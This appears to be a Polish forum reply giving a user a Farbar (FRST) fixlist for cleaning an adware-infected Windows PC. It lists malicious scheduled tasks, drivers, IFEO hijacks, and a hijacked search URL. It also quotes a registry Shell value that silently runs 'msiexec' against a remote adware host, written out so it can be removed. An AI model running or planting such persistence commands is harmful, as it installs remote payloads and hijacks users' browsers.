Odinstaluj AlphaGo,SUPERAntiSpyware,Traffic Exchange,WebStorage,YAC(Yet Another Cleaner!).Otwórz notatnik systemowy i wklej: CloseProcesses: Task: {02115EE4-134B-4B21-BA13-19F85B6414A7} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-03-09] Task: {0EF1B2FC-4B5D-4A0C-B66D-ED0E8D900F6E} - System32\Tasks\Qajichghafot Verfier => C:\Program Files (x86)\Aronisshuput\mefagh.exe [2017-03-01] (Glarysoft Ltd) Task: {1685C633-CED1-4E99-A4E1-447078291882} - System32\Tasks\Traffic Exchange v2 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA Task: {1B1C3A19-0C70-4AFD-9C8B-CDCC12FE4EE0} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA Task: {3F7FF836-5D81-49A9-87C1-6E576CC72842} - \WPD\SqmUpload_S-1-5-21-4222332460-577234965-4240529536-1001 -> Brak pliku <==== UWAGA Task: {4098A174-BDBE-4852-8811-DB9A235E63C8} - System32\Tasks\Traffic Exchange v2 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA Task: {47307328-AD9B-44A9-AD79-BB89C937452A} - System32\Tasks\Traffic Exchange v209 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA Task: {4F4B8DC3-6448-479A-8B6A-48402E64C929} - System32\Tasks\Traffic Exchange v209 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA Task: {667C8589-8C4F-4D13-A101-0338E91C0747} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-05-11] (UCWeb Inc) <==== UWAGA Task: {6BBAD6B3-D656-4100-90DB-A9F6CC0F5957} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA Task: {7B162E0E-2D05-4C3B-A8FA-9D63CFBEEB9A} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA Task: {9A704A04-B0C1-4CAD-A8B3-1799E26EDF05} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA Task: {BD4E4CEB-A1A7-47F8-B4F9-07FB157731D6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA Task: {C95B0443-C7E7-4A01-A844-E3D1A05504F1} - System32\Tasks\Traffic Exchange v2 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA Task: {D287B9C8-AFCE-49AB-B5EA-6EAA82DC9366} - System32\Tasks\Traffic Exchange v209 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA Task: C:\WINDOWS\Tasks\Traffic Exchange v2 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA Task: C:\WINDOWS\Tasks\Traffic Exchange v2 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA Task: C:\WINDOWS\Tasks\Traffic Exchange v2 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA Task: C:\WINDOWS\Tasks\Traffic Exchange v209 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA Task: C:\WINDOWS\Tasks\Traffic Exchange v209 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA Task: C:\WINDOWS\Tasks\Traffic Exchange v209 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== UWAGA Task: C:\WINDOWS\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA lternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [25444] AlternateDataStreams: C:\WINDOWS\system32\drivers:x64 [1498914] AlternateDataStreams: C:\WINDOWS\system32\drivers:x86 [1223458] AlternateDataStreams: C:\ProgramData\TEMP:BC359956 [127] Hosts: HKU\S-1-5-21-4222332460-577234965-4240529536-1001\...\Run: [C] => cmd /c(@attrib -H -R -S C:\WINDOWS\system32\GroupPolicy\Machine\Registry.pol >nul)&(@copy/b/y C:\WINDOWS\system32\GroupPolicy\Machine\R C:\WINDOWS\system32\GroupPolicy\Machine\Registry.pol >nul)&(@att (dane wartości zawierają 99 znaków więcej). <===== UWAGA HKU\S-1-5-21-4222332460-577234965-4240529536-1001\...\RunOnce: [Uninstall C:\Users\Ksieznisia\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Ksieznisia\AppData\Local\Microsoft\OneDrive\17.3.6390.0509_1\amd64" HKU\S-1-5-21-4222332460-577234965-4240529536-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj83NdZLRjHyNYE3OWQWNWZSOYFxMUVSMYNLOWF5FTZYFq== /q HKU\S-1-5-21-4222332460-577234965-4240529536-1001\...\MountPoints2: {3d6f00b6-9ee6-11e5-8263-28c2dd242364} - "F:\setup.exe" HKU\S-1-5-21-4222332460-577234965-4240529536-1001\...\MountPoints2: {787b6da5-e929-11e6-8296-28c2dd242364} - "G:\HiSuiteDownLoader.exe" HKU\S-1-5-21-4222332460-577234965-4240529536-1001\...\MountPoints2: {c8d71462-1f5e-11e7-82a4-28c2dd242364} - "F:\HiSuiteDownLoader.exe" HKU\S-1-5-21-4222332460-577234965-4240529536-1001\...\MountPoints2: {c8d7164b-1f5e-11e7-82a4-28c2dd242364} - "F:\HiSuiteDownLoader.exe" HKU\S-1-5-21-4222332460-577234965-4240529536-1001\...\MountPoints2: {ecc35fdf-0b62-11e7-82a0-28c2dd242364} - "F:\AutoRun.exe" HKU\S-1-5-18\...\Run: [] => [X] HKLM\...\Providers\jda4smy2: C:\Program Files (x86)\Qajichghafot Verfier\local64spl.dll <===== UWAGA IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku GroupPolicy: Ograniczenia - Chrome <======= UWAGA CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-4222332460-577234965-4240529536-1001\Software\Microsoft\Internet Explorer\Main,Start Page = HKU\S-1-5-21-4222332460-577234965-4240529536-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccZ_nipNScChzx3yP9lwemGIubJY3GWzXjOFmIiYVP4fbfMy7eYMn1y3t62Jcj1LUNOmFI7un5r8zrmUiVuBdoVfArZe2rVocZxiWOSMKppy7Pi3qxHphXyWn6H3YxPvDjP915NBat7Y9L42Edfb5oz9siA-kA,,&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope - brak wartości Edge HomeButtonPage: HKU\S-1-5-21-4222332460-577234965-4240529536-1001 -> hxxp://www.startpageing123.com/?type=hp&ts=1488816839&z=354bbc578edd6ab521ba041g3zdbfbfb9g3q9becdm&from=che0812&uid=HGSTXHTS541010A9E680_JA1009C035TBUP35TBUPX CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.luckysearch123.com/search.php?type=ds&ts=1495097013&from=e8d90518&uid=hgstxhts541010a9e680_ja1009c035tbup35tbupx&z=126eae08d66f75286786e62g1z4t3wce8t8m5eagbg&q={searchTerms} CHR DefaultSearchKeyword: ChromeDefaultData -> luck CHR Profile: C:\Users\Ksieznisia\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-06-10] <==== UWAGA CHR HKU\S-1-5-21-4222332460-577234965-4240529536-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ofoeigeaodhbjogdigckajfhjbonaofg] - hxxps://clients2.google.com/service/update2/crx R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda) R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [599440 2017-05-11] () <==== UWAGA R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA R1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== UWAGA U2 CSHMDR; Brak ImagePath U2 glory; Brak ImagePath U2 snare; Brak ImagePath U2 WinSnare; Brak ImagePath 2017-05-27 23:21 - 2017-06-10 13:58 - 00000000 ____D C:\AdwCleaner 2017-05-17 12:09 - 2017-05-17 12:09 - 00000000 ____D C:\Program Files (x86)\Elex-tech 2017-05-11 10:49 - 2017-05-11 17:06 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333 2017-05-11 10:49 - 2017-05-11 17:06 - 00000000 _____ C:\WINDOWS\SysWOW64\22 2017-05-11 10:49 - 2017-05-11 17:06 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111 2017-05-11 10:49 - 2017-05-11 17:06 - 00000000 _____ C:\WINDOWS\SysWOW64\11 2017-05-11 10:49 - 2017-05-11 17:06 - 00000000 _____ C:\WINDOWS\SysWOW64\00 EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom jako administrator FRST i kliknij w Fix/Napraw. Pokaż nowy raport z FRST bez Addition i Shortcut